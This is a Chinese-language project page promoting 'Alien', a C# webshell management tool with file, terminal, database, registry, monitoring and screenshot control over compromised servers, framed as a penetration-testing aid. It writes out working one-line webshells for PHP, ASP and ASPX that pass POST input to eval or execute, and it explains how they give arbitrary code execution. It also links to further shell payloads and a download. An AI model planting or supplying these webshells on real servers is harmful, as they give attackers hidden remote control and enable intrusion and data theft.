Alien

項目簡介

語言

C# .NET Framework V4.8

功能

• File Manager （可顯示圖片， 可SearchFile）
• 虛擬終端
• 數據庫
• 注冊表
• 監控
• 截圖
• 系統信息

項目描述

一句話木馬

一句話木馬是在滲透測試中用來控制服務器的工具

強大之處在于木馬本身體積小，不易發現

以下是最簡單的一句話木馬

PHP <?php @eval($_POST['password']);?>ASP <%execute(request("password"))%>ASPX <%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>當然， Alien還可以使用asmx， ashx等等的Webshell。NodeJS和JSP https://github.com/malbuffer4pt/Alien/blob/main/shell.txt

關于JSP webshell

目前只有比較原始的菜刀版本， 之后可能會加上蟻劍和冰蝎

shell有進行更改， 新增了可以顯示圖片的功能

關于NodeJS webshell

由于NodeJS特性， 原理跟一般php asp aspx等動態語言的shell不同， 

NodeJS目的重在管理而非滲透

伺服器

Windows， Linux， Unix， MacOS

Database管理

MySQL ：PHP

交通 ：https://github.com/malbuffer4pt/DBer

SQL Server ：ASP ASPX ASMX ASHX

原理

以PHP為例子， eval（）可以把string以PHP Code去執行，

如果eval（）中帶有可控變量，那么就可以執行任意代碼。 

如eval（$_POST['a']）;

HTTP POST a=phpinfo(); 就可以執行phpinfo（）;

注意!

• 工具Payloads文件夾內有符合惡意程序的Payload， 可能會被防毒刪除
• 目前只有刪減版，但部份代碼沒有刪除，Disassemble應該會有奇怪但無法使用的東西

圖片

項目地址：

https://github.com/malbuffer4pt/Alien

網盤下載地址：

鏈接：https://pan.quark.cn/s/a3270016801d